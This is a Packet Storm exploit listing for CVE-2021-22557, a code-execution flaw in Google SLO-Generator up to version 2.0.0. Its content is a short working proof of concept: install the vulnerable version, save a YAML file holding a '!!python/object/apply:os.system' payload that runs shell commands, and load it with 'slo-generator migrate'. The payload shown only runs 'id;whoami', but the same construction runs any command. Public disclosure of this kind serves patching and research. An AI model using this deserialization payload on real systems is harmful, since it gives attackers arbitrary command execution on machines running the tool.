Lucene search

K
packetstormKiran GhimirePACKETSTORM:164426
HistoryOct 07, 2021 - 12:00 a.m.

Google SLO-Generator 2.0.0 Code Execution

2021-10-0700:00:00
Kiran Ghimire
packetstormsecurity.com
211
`# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution  
# Date: 2021-09-28  
# Exploit Author: Kiran Ghimire  
# Software Link: https://github.com/google/slo-generator/releases  
# Version: <= 2.0.0  
# Tested on: Linux  
# CVE: CVE-2021-22557  
  
##############################################################################  
  
*Introduction*:  
Is a tool to compute and export Service Level Objectives (SLOs), Error  
Budgets and Burn Rates, using configurations written in YAML (or JSON)  
format.  
  
##############################################################################  
  
*POC:*  
1. pip3 install slo-generator==2.0.0  
2. 2. Save the below yaml code in a file as exploit.yaml.  
!!python/object/apply:os.system ["id;whoami"]  
3. Run the below command  
slo-generator migrate -b exploit.yaml  
##############################################################################  
  
  
`
Related for PACKETSTORM:164426